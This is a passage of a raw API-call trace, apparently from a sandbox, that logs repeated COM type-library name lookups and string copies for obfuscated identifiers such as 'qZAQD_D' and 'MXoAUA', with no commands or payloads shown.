lHashVal=0x1027f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.312] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.312] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.312] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="i1_UZGA", lHashVal=0x1027f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.312] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.312] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.312] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="i1_UZGA", lHashVal=0x1027f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.312] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8035e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="i1_UZGA") returned 8 [0069.312] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="i1_UZGA", lHashVal=0x1027f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.312] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.312] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8035e | out: _Dst=0x67c2d40) returned 0x0 [0069.313] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_i1_UZGA") returned 0x102b74 [0069.313] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_i1_UZGA" | out: _Dst="_B_var_i1_UZGA") returned 0x0 [0069.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_i1_UZGA") returned 15 [0069.313] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.313] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_i1_UZGA", lHashVal=0x102b74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.313] IUnknown:Release (This=0x665ba50) returned 0xd [0069.313] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.313] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_i1_UZGA", lHashVal=0x102b74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.313] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.313] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.313] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_i1_UZGA", lHashVal=0x102b74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.313] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.313] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.313] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_i1_UZGA", lHashVal=0x102b74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.313] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.313] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.313] IUnknown:Release (This=0x665ba50) returned 0xd [0069.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1229e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_i1_UZGA") returned 15 [0069.313] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_i1_UZGA", lHashVal=0x102b74, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x5a005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x5a005500000000, pDummy=0x0) returned 0x0 [0069.313] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8035e | out: _Dst=0x144ec0) returned 0x0 [0069.314] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qZAQD_D", lHashVal=0x1016a5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80336, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qZAQD_D") returned 8 [0069.314] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qZAQD_D", lHashVal=0x1016a5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80336, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qZAQD_D") returned 8 [0069.314] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qZAQD_D", lHashVal=0x1016a5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.314] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qZAQD_D") returned 0x1016a5 [0069.314] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="qZAQD_D" | out: _Dst="qZAQD_D") returned 0x0 [0069.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="qZAQD_D") returned 8 [0069.314] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.314] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qZAQD_D", lHashVal=0x1016a5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.314] IUnknown:Release (This=0x665ba50) returned 0xd [0069.314] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.314] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qZAQD_D", lHashVal=0x1016a5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.314] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.314] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.314] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qZAQD_D", lHashVal=0x1016a5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.314] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.314] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.314] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qZAQD_D", lHashVal=0x1016a5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.314] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80336, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qZAQD_D") returned 8 [0069.314] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qZAQD_D", lHashVal=0x1016a5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.315] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.315] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80336 | out: _Dst=0x67c2d40) returned 0x0 [0069.315] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qZAQD_D") returned 0x100aa8 [0069.315] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_qZAQD_D" | out: _Dst="_B_var_qZAQD_D") returned 0x0 [0069.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_qZAQD_D") returned 15 [0069.315] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.315] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qZAQD_D", lHashVal=0x100aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.315] IUnknown:Release (This=0x665ba50) returned 0xd [0069.315] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.315] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qZAQD_D", lHashVal=0x100aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.315] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.315] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.315] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qZAQD_D", lHashVal=0x100aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.315] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.315] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.315] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qZAQD_D", lHashVal=0x100aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.315] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.315] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.315] IUnknown:Release (This=0x665ba50) returned 0xd [0069.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b122ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_qZAQD_D") returned 15 [0069.315] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qZAQD_D", lHashVal=0x100aa8, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x44005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x44005100000000, pDummy=0x0) returned 0x0 [0069.315] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80336 | out: _Dst=0x144ec0) returned 0x0 [0069.315] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MXoAUA", lHashVal=0x1054f7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MXoAUA") returned 7 [0069.315] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MXoAUA", lHashVal=0x1054f7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MXoAUA") returned 7 [0069.316] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MXoAUA", lHashVal=0x1054f7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.316] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MXoAUA") returned 0x1054f7 [0069.316] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="MXoAUA" | out: _Dst="MXoAUA") returned 0x0 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="MXoAUA") returned 7 [0069.316] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.316] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MXoAUA", lHashVal=0x1054f7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.316] IUnknown:Release (This=0x665ba50) returned 0xd [0069.316] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.316] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MXoAUA", lHashVal=0x1054f7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.316] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.316] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.316] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MXoAUA", lHashVal=0x1054f7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.316] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.316] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.316] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MXoAUA", lHashVal=0x1054f7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.316] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MXoAUA") returned 7 [0069.316] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MXoAUA", lHashVal=0x1054f7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.316] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.316] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b803ae | out: _Dst=0x67c2d40) returned 0x0 [0069.316] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MXoAUA") returned 0x10cfa0 [0069.316] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_MXoAUA" | out: _Dst="_B_var_MXoAUA") returned 0x0 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_MXoAUA") returned 14 [0069.316] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.316] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MXoAUA", lHashVal=0x10cfa0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.317] IUnknown:Release (This=0x665ba50) returned 0xd [0069.317] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.317] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MXoAUA", lHashVal=0x10cfa0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.317] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.317] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.317] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MXoAUA", lHashVal=0x10cfa0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.317] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.317] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.317] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MXoAUA", lHashVal=0x10cfa0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.317] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.317] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.317] IUnknown:Release (This=0x665ba50) returned 0xd [0069.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b122fe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_MXoAUA") returned 14 [0069.317] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MXoAUA", lHashVal=0x10cfa0, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0069.317] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b803ae | out: _Dst=0x144ec0) returned 0x0 [0069.317] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZUUCkx", lHashVal=0x107197, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZUUCkx") returned 7 [0069.317] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZUUCkx", lHashVal=0x107197, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZUUCkx") returned 7 [0069.317] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZUUCkx", lHashVal=0x107197, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.317] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZUUCkx") returned 0x107197 [0069.317] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ZUUCkx" | out: _Dst="ZUUCkx") returned 0x0 [0069.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ZUUCkx") returned 7 [0069.318] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.318] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZUUCkx", lHashVal=0x107197, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.318] IUnknown:Release (This=0x665ba50) returned 0xd [0069.318] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.318] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZUUCkx", lHashVal=0x107197, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.318] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.318] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.318] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZUUCkx", lHashVal=0x107197, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.318] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.318] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.318] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZUUCkx", lHashVal=0x107197, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.318] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZUUCkx") returned 7 [0069.318] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZUUCkx", lHashVal=0x107197, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.318] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.318] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b803d6 | out: _Dst=0x67c2d40) returned 0x0 [0069.318] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZUUCkx") returned 0x10ec40 [0069.318] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ZUUCkx" | out: _Dst="_B_var_ZUUCkx") returned 0x0 [0069.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ZUUCkx") returned 14 [0069.318] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.318] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZUUCkx", lHashVal=0x10ec40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.318] IUnknown:Release (This=0x665ba50) returned 0xd [0069.318] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.318] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZUUCkx", lHashVal=0x10ec40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.318] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.318] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.318] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZUUCkx", lHashVal=0x10ec40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.319] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.319] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.319] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZUUCkx", lHashVal=0x10ec40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.319] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.319] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.319] IUnknown:Release (This=0x665ba50) returned 0xd [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1232e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ZUUCkx") returned 14 [0069.319] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZUUCkx", lHashVal=0x10ec40, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x6b004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x6b004300000000, pDummy=0x0) returned 0x0 [0069.319] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b803d6 | out: _Dst=0x144ec0) returned 0x0 [0069.319] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wDxcZD", lHashVal=0x10b988, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wDxcZD") returned 7 [0069.319] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wDxcZD", lHashVal=0x10b988, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 